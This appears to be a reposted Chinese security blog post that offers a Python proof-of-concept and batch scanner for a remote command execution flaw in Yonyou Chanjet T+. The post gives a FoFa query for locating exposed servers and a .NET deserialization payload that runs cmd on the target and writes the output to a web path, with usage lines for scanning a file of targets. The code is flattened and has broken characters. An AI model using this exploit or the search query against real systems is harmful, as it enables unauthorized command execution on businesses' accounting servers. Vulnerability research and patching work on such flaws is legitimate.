FoFa搜索语法:
'app="畅捷通-TPlus"
使用AsamF进行搜索:
POC代码:
import requestsimport argparseimport urllib3import sysurllib3.disable_warnings()def title(vuln):print("""{}use: python3 {}.pyAuthor: kento-sec""".format(vuln,vuln))class information(object):def __init__(self, args,vuln):self.args = argsself.url = args.urlself.file = args.fileself.vuln = vulndef target_url(self):try:requests.packages.urllib3.disable_warnings()header = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36','Content-Type': 'application/json','X-Ajaxpro-Method': 'GetStoreWarehouseByStore'}headerGet = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36','Accept': '*/*','Accept-Encoding':'gzip, deflate','Accept-Language':'zh-CN, zh;q=0.9, en-US;q=0.8, en;q=0.7, zh-Tw;q=0.6','Cookie': 'ASP.NET_SessionId=pi34odn201uyh0ja51higr2r'}payload = {"storeID":{"__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","MethodName":"Start","ObjectInstance":{"__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","StartInfo":{"__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","FileName":"cmd","Arguments":"/c whoami > C:/Progra~2/Chanjet/TPlusStd/WebSite/2RUsL6jgx9sGX4GItQBcVfxarBM.txt"}}}}url = self.url + "/tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore"web = requests.post(url, headers=header, json=payload, verify=False, timeout=5)if web.status_code == 200:getWeb =requests.get(self.url+"/tplus/2RUsL6jgx9sGX4GItQBcVfxarBM.txt",headers=headerGet,verify=False,timeout=5)if getWeb.status_code == 200 and 'system' in getWeb.text:print("�33[36m[o]目标存在{},漏洞位置:{} �33[0m".format(self.vuln,url))with open("{}结果.txt".format(self.vuln), mode="a") as rp:rp.write(self.url + "n")else:print("�33[31m[x] 目标 {} 不存在{} �33[0m".format(self.url,self.vuln))except requests.exceptions.ConnectionError:print("链接错误")passexcept requests.exceptions.ReadTimeout:print("链接错误")passdef file_url(self):with open(self.file, "r") as urls:for url in urls:url = url.strip() # 去除两边空格if url[:4] != "http":url = "http://" + urlself.url = url.strip()information.target_url(self)if __name__ == "__main__":vuln = "用友畅捷通T+GetStoreWarehouseByStore远程命令执行漏洞"title(vuln)parser = argparse.ArgumentParser(description=vuln)parser.add_argument("-u", "--url", type=str, metavar="url", help="Target url eg:"http://127.0.0.1"")parser.add_argument("-f", "--file", metavar="file", help="Targets in file eg:"target.txt"")args = parser.parse_args()if len(sys.argv) != 3:print("[-] 参数错误!neg1:>>>python3 {}.py -u http://127.0.0.1neg2:>>>python3 {}.py -f ip.txt".format(vuln,vuln))elif args.url:information(args,vuln).target_url()elif args.file:information(args,vuln).file_url()
使用:
python 用友畅捷通T+GetStoreWarehouseByStore远程命令执行漏洞.py -f targetFile.txt
结果会自动保存:
原文始发于微信公众号(赛哈文):用友畅捷通T+GetStoreWarehouseByStore 远程命令执行漏洞批量验证工具
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论